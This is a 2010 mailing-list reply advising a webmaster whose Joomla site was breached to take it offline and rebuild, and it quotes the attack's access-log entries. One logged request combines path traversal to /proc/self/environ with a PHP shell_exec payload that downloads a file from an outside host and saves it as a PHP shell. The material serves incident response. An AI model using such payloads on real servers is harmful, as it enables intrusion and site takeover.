[thelist] block phishing

John List johnlist at gulfbridge.net
Sun Mar 28 14:18:20 CDT 2010

On 03/28/2010 12:20 PM, Bob Meetin wrote:
> I got a notice that one of my sites got hit yesterday, so I logged in, 
> and identified the file mentioned, also found a couple php files that 
> got dropped into webhome that were related. I moved the files into an 
> out of webroot folder for future scrutinization, then checked the 
> server access log, found a number of entries at the approximate date 
> stamp of the uploaded files that seemed to be related.
> I am methodically going through the system looking for anything not 
> locked down. What I could use some help with is understanding if the 
> access log entries are associated and how to lock out the intruders. 
> As IP addresses change I suspect it's more than simply editing the 
> robots.txt or adding a line in the .htaccess.


I'm a long time subscriber to this list but don't read all the posts so 
pardon me if I'm missing some context here. My impression is this:


      You say you "got a notice" that one of your sites has been "hit"
      and you have identified the "file mentioned". From that and your
      post's subject I infer that you mean that someone notified you
      that your site is hosting a phishing exploit.


      Your reaction so far is to look at the web log and consider
      tweaking your web configuration.

My reaction is that you are taking this far too lightly. The fact that 
someone else has, without your knowledge, placed files on your system 
indicates that your system had a vulnerability and is now compromised.

You should therefore take your system off line and rebuild it from 
scratch using backups.

To prevent such an exploit on your rebuilt system, you should do some 
forensics on the current system's disk before wiping it to determine how 
someone gained access. (Hint: The compromise occurred before the post of 
/fat.php but it has nothing to do with baidu.com or its spider.)

I am not familiar with Joomla's vulnerabilities, but if you suspect the 
intruder came via the web, then I'd recommend you do an inquiry on a 
Joomla list. Otherwise, you shouldn't rule out an intrusion thru ftp or 
ssh. So you need to check all your logs, not just your web log. (But a 
sophisticated attack will cover its tracks by altering the logs so you 
may never know.)

But even if you determine how they did this, you don't know how much 
damage they did. That's why it's important to rebuild your system.

Good luck,


> Some of the suspicious entries look like:
> - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 
> 18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
> - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1" 
> 200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U; 
> Windows NT 6.0; en-US; rv: Gecko/20090729 Firefox/3.5.2 (.NET 
> CLR 3.5.30729)"
> fat.php was one of the deposited files. 18:58 was the datestamp.
> - - [27/Mar/2010:22:25:47 -0500] "GET 
> /administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
> Related? There is nothing (current) in the filesystem called host.php
> - - [27/Mar/2010:22:25:41 -0500] "GET 
> /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00%0F 
> HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download 
> http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt 
> print_out.php');?>"
> com_sectionex is a Joomla component. There is also no legitimate file 
> called print_out.php but which I found.
> - - [27/Mar/2010:22:25:48 -0500] "GET 
> /administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
> Suggestions for robots.txt:
> |#Baiduspider
> User-agent: Baiduspider
> Disallow: /
> #Others
> User-agent: *
> Disallow: /
> Suggestions for .htaccess:
> ||<Files *.*>
> order allow,deny
> allow from all
> deny from 220.181.
> </Files>
> -Bob
> |

More information about the thelist mailing list